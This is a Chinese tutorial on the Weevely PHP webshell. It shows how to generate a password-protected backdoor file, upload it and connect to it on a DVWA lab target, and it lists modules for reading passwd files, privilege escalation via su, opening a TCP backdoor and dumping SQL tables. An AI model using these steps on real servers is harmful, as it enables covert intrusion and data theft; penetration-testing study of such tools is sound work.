Weevely的使用与维护

软件特点
生成和管理很难检测到的PHP木马，Weevely是一个隐形的PHP网页的外壳，模拟的远程连接。这是一个Web应用程序后开发的重要工具，可用于像一个隐藏的后门，作为一个有用的远程控制台更换管理网络帐户，即使托管在免费托管服务。只是生成并上传“服务器”目标Web服务器上的PHP代码，Weevely客户端在本地运行shell命令传输。
简介
weevely 属于php 的 webshell 工具。但相较于 webacoo ，weevely 的功能更加强大，同时对于webshell的连接设立了密码选项！并且携带了大量的管理模块，为渗透带来了更多的惊喜与便利.
使用步骤：
第一步
kali@root# weevely generate [password] /root/xx.php #//生成xx.php的backdoor 密码为password


第二步
upload backdoor to website and get backdoor url path
weevely连接shell

输入命令：weevely shell文件地址 密码 tab键查看命令
weevely http://192.168.164.128/dvwa/hackable/uploads/1.php password
加粗的位置注意


通过执行命令（包括weevely的命令以及系统命令）来检测连接是否成功

如果能够执行命令则说明连接成功，如果weevely没有反应则代表连接失败
看准你的靶机的系统类型

出现中文乱码问题
这是因为kail字符编码问题，这里可以临时修改设置一下字符编码，终端 >> 设定字符编码 >>简体中文

weevely信息探测
system
:system_info

net
:net_ifconfig

:net_scan

file文件操作
:file_upload 本地文件路径 文件 上传路径

:file_read 文件



其强大的管理模块！使用 help 命令来查看可用模块
:audit_phpconf? 审计PHP配置文件
:audit_suidsgid? 通过SUID和SGID来查找文件
:audit_etcpasswd? 通过其它手段获取PASSWD
:audit_filesystem? 错误权限的审计系统文件
:shell_su 利用SU命令提权
:shell_php? 执行PHP命令
:shell_sh? 执行shell命令
:system_extensions? 收集PHP和web服务器的延伸列表
:system_info? 收集系统信息
:backdoor_tcp 在TCP类端口生成一个后门
:sql_dump 导出数据表
:sql_console 执行SQL查询命令或启动控制台
:net_ifconfig? 获取目标网络地址
:net_proxy? 通过本地HTTP进行代理
:net_scan? TCP端口扫描
:net_curl? 远程执行HTTP请求
:net_phpproxy? 在目标系统安装PHP代理